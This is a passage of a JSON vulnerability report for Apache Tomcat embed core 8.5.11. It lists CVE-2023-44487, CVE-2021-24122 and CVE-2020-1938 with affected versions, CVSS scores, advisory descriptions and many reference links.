List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"W3 Mailing List","url":"https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html"},{"summary":"Nginx Mailing List","url":"https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html"},{"summary":"Microsoft Advisory 2","url":"https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2"},{"summary":"CVE Record","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487"},{"summary":"F5 Advisory K000137106","url":"https://my.f5.com/manage/s/article/K000137106"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Openssf Advisory http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response","url":"https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"summary":"Seanmonstar Advisory hyper-http2-rapid-reset-unaffected","url":"https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected"},{"summary":"Gentoo Advisory glsa-202311-09","url":"https://security.gentoo.org/glsa/202311-09"},{"summary":"NetApp Advisory 
ntap-20231016-0001","url":"https://security.netapp.com/advisory/ntap-20231016-0001"},{"summary":"NetApp Advisory ntap-20240426-0007","url":"https://security.netapp.com/advisory/ntap-20240426-0007"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Cve 2023","url":"https://security.paloaltonetworks.com/CVE-2023-44487"},{"summary":"CVE Record","url":"https://ubuntu.com/security/CVE-2023-44487"},{"summary":"Bleepingcomputer Advisory new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records","url":"https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"summary":"Cve 2023","url":"https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"},{"summary":"Darkreading Advisory internet-wide-zero-day-bug-fuels-largest-ever-ddos-event","url":"https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"},{"summary":"Debian Advisory dsa-5540","url":"https://www.debian.org/security/2023/dsa-5540"},{"summary":"Debian Advisory dsa-5549","url":"https://www.debian.org/security/2023/dsa-5549"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"},{"summary":"Debian Advisory dsa-5570","url":"https://www.debian.org/security/2023/dsa-5570"},{"summary":"Eclipse Advisory msg00181","url":"https://www.eclipse.org/lists/jetty-announce/msg00181.html"},{"summary":"Haproxy Advisory 
haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487","url":"https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"summary":"Netlify Advisory netlify-successfully-mitigates-cve-2023-44487","url":"https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487"},{"summary":"Nginx Advisory http-2-rapid-reset-attack-impacting-f5-nginx-products","url":"https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/10/10/6"},{"summary":"Phoronix Advisory HTTP2-Rapid-Reset-Attack","url":"https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack"},{"summary":"Theregister Advisory http2_rapid_reset_zeroday","url":"https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-44487/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-24122"]}],"cve":"CVE-2021-24122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized 
Actor"},"discovery_date":"2021-05-13T22:30:02","ids":[{"system_name":"CVE Record","text":"CVE-2021-24122"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210212-0008"}],"notes":[{"audience":"developers","category":"other","text":"Use of Incorrectly-Resolved Name or Reference","title":"Additional CWE: 706"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Tomcat When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. 
## Related CVE(s) BIT-tomcat-2021-24122, CVE-2021-24122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.60"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/01/14/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"NetApp Advisory 
ntap-20210212-0008","url":"https://security.netapp.com/advisory/ntap-20210212-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"]}],"title":"CVE-2021-24122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1938"]}],"cve":"CVE-2020-1938","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2020-06-15T18:51:21","ids":[{"system_name":"CVE Record","text":"CVE-2020-1938"},{"system_name":"Blackberry Advisory","text":"articleDetail"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"Gentoo Advisory","text":"glsa-202003-43"},{"system_name":"NetApp Advisory","text":"ntap-20200226-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Privilege Management in Tomcat"},{"category":"details","details":"Vulnerability 
Details","text":"# Improper Privilege Management in Tomcat When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. 
## Related CVE(s) BIT-tomcat-2020-1938, CVE-2020-1938"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html"},{"summary":"Blackberry Advisory articleDetail","url":"http://support.blackberry.com/kb/articleDetail?articleNumber=000062739"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing 